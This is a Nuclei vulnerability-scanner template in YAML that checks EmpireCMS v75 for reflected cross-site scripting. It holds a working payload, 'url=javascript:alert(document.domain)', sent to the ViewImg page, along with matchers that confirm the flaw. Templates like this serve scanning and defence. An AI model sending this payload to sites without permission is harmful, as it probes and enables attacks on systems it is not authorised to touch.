nuclei-templates/vulnerabilities/other/empirecms-xss.yaml

26 lines
497 B
YAML

id: empirecms-xss
info:
name: EmpireCMS v75 Cross-Site Scripting
author: pikpikcu
severity: medium
reference:
- https://www.geek-share.com/detail/2777280260.html
tags: empirecms,xss
requests:
- method: GET
path:
- "{{BaseURL}}/e/ViewImg/index.html?url=javascript:alert(document.domain)"
matchers-condition: and
matchers:
- type: word
words:
- 'onmousewheel=\"return bbimg(this)\"'
- type: status
status:
- 200